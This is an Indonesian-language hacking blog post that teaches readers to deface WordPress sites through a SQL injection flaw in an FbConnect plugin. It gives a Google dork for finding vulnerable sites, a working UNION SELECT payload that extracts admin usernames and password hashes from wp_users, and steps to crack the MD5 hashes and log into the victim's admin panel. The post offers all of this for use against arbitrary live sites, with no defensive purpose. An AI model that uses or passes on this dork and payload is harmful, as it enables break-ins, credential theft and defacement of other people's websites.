Deface Dengan FbConnect Injection Vulnerability

Hello ...Pengunjung Setia Ane ...
mau Berbagi ILMU nih ... 

berhubung lagi mau berbagi ..
langsung aja deh yaa disimak tutorialnya :P
pada dasarnya tutorial ini sama layaknya seperti SQL Manual
namun beda nya ini menggunakan Kelemahan BUG Profile Facebook Pengunjung!

LANGSUNG DISIMAK AJA DEH YAA !!!
KE TKP

1.Dork :
inurl:"fbconnect_action=myhome"  (kembangin lagi .. tambahin site:com/terserah situ maunya negara mana)
maka akan muncul tampilan banyak tuh ... yang dibelakang URL websitenya ada link sama kya dork :P (?fbconnect blablabla)
langsung klik aja ...
kalau VULN akan Seperti ini :
liat GAMBAR

kalau udah kya gitu 

EXPLOIT Dengan ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--
Kalau MUNCUL kya GAMBAR Dibawah ini

maka Kalian SUKSES!! tinggal Eksekusi saja yakni dengan Mengcrack Dah tuh password berbentuk MD5 :P

kalau udah sukses Di Decrypte tinggal LOGIN deh ke panel adminnya yakni di http://www.situstarget.com/wp-login.php :P

Dan Dicoba SUKSES!!!

okee sekian TUTOR dari ane nih ...
kurang jelas ?COMENT aja Nanti Di jawab :P

NITIP Nama Yak kalau sukses!! :P

COPAS?Sertakan Sumbernya  hargai karya orang lain bung


Mr.XSecr3t